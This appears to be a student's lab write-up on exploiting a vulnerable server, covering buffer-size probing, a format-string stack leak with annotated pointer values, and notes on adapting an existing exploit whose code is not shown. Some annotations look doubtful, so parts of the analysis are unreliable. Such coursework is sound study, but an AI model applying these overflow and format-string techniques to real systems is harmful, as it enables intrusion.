a Determining the buffer size: the input sent was a long run of the repeated digit sequence "1234567890..." (long enough to overrun the buffer; the full payload is omitted here). The buffer size seems to be 500.

Finding the return address: the input sent was a long run of "%p" format specifiers, so the vulnerable *printf call printed the contents of the stack as a sequence of pointers (the full dump is omitted here). Let's break this up:

0x7ffff7ff81fe
0x7ffff7dd8de0 <-- saved frame pointer *printf
0xfbad2088 <-- return address *printf
0x7025702570257025 <-- buffer (the bytes of the "%p%p%p%p" input itself)
...
0x7025702570257025
0x7fffffffe450 <-- perhaps some local variable, looks like a pointer
0x7fffffffe670 <-- saved frame pointer parent function
0x4006b2 <-- return address parent function
(nil)
0x100400530
...

The saved frame pointer of the *printf function is 0x7ffff7dd8de0, so the buffer address is around that, probably a bit lower.

b Lucky me, during the SWS course I found a usable exploit on the vulnerable server. Let's use that one. See directory exploit. Changes to the original:
* genexploit.sh, 34 changed to 434 (buffer changed from 100 to 500)
* genretaddr.sh, return address updated
* README, 2266 replaced with 2288

c The server crashed on Tuesday evening; I didn't pursue this any further.